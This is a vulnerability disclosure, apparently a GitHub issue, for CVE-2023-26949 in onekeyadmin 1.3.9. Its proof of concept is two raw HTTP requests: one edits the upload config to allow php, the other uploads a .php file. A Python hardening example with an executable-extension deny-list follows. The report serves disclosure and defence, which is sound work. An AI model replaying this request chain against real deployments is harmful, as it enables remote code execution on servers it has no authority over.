CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin
An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerability affects product: onekeyadmin
Vulnerability affects version: 1.3.9
Vulnerability type: Remote code execution
Vulnerability Details:
Remote code execution caused by uploading arbitrary files in the background
Vulnerability location:
The vulnerability is in app\admin\controller\File#upload. Although this method restricts the file extensions (ext) that may be uploaded, the restriction is configurable, and the app\admin\controller\Config#update method allows that limit to be updated, so the allowed extension list can be changed to include php.
Vulnerability reproduction
Preconditions: administrator privileges
PoC
The first step is to update the configuration to allow uploading php files:

```http
POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

{"title":"上传限制","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}
```

The second step is to upload the malicious file:

```http
POST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: */*
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"

templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php

------WebKitFormBoundaryARP8fRC2kb4GP3oP--
```
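The root cause above is that the upload allow-list lives in admin-editable configuration, so the admin role can unlock php. As an added example (not onekeyadmin's code), the Python below models the missing control: the configured ext list is still consulted, but it is intersected with a fixed server-side deny-list that no config update can override, and a config update containing executable extensions is flagged before it is saved. The deny-list, the config dict (shaped like the PoC's JSON body) and the file names are constructed for the example.

```python
"""Hardened upload-extension policy (added example, not onekeyadmin's code):
the admin-editable 'ext' allow-list is still honoured, but intersected with a
fixed server-side deny-list, so a config update cannot re-enable php."""
from __future__ import annotations

# Extensions the web server may execute; never unlockable via configuration.
# Constructed for this example; tune to the deployment's handler mappings.
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht",
    "shtml", "htaccess", "htpasswd", "cgi", "pl", "jsp", "asp", "aspx",
})

# Upload config in the same shape as the PoC's JSON body (constructed values).
UPLOAD_CONFIG = {
    "admin": {"ext": {"image": "png,jpg,jpeg,bmp,gif,ico",
                      "other": "zip,rar,pdf,txt,php"}},
    "index": {"ext": {"image": "png,jpg"}},
}

def allowed_extensions(config: dict, scope: str) -> set[str]:
    """Flatten a scope's per-type ext lists, minus executable extensions."""
    exts: set[str] = set()
    for csv in config.get(scope, {}).get("ext", {}).values():
        exts.update(e.strip().lower() for e in csv.split(",") if e.strip())
    return exts - EXECUTABLE_EXTENSIONS  # config can never override the deny-list

def file_extension(filename: str) -> str | None:
    """Normalised final extension, or None if the name is unsafe."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]  # strip any path
    if "\x00" in name or name.endswith(".") or "." not in name:
        return None
    parts = name.lower().split(".")
    # Reject executable names in any position, e.g. 1.php.jpg or .htaccess
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return None
    return parts[-1]

def is_upload_allowed(filename: str, config: dict, scope: str = "admin") -> bool:
    ext = file_extension(filename)
    return ext is not None and ext in allowed_extensions(config, scope)

def validate_config_update(value: dict) -> list[str]:
    """List 'scope.ext.kind: ext' entries that try to allow executable types."""
    return [f"{scope}.ext.{kind}: {e.strip()}"
            for scope, section in value.items()
            for kind, csv in section.get("ext", {}).items()
            for e in csv.split(",") if e.strip().lower() in EXECUTABLE_EXTENSIONS]
```

Run `validate_config_update` on the decoded body of a config/update request before persisting it; with the PoC's body it reports the php entry under admin.ext.other, and `is_upload_allowed("1.php", ...)` stays False even if the entry were saved.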